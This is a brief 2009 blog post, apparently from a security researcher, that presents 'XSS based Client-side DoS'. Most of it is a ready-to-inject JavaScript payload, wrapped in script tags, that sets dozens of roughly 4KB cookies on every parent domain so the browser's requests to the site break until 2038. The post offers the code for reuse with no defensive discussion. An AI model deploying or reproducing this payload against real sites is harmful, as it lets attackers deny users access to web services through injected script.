Sunday, May 10, 2009

XSS based Client-side DoS

Makes the client's cookie for the site per subdomain 200kb.
http://pastebin.com/f3dfe04f7

/*<script>/*code to create a 200KB of cookies per subdomain*/with(document)domain.replace(/[^.]*\.?/g,function(a){try{domain=domain.replace(a,"")}catch(e){a=""}finally{for(i=0;i<50;i++)cookie=i+"="+Array(4095)+";expires=9 Jan 2038 23:59 GMT;path=/;domain=."+a+domain}})//</script>

I pasted the code in case it gets lost on Pastebin

No comments: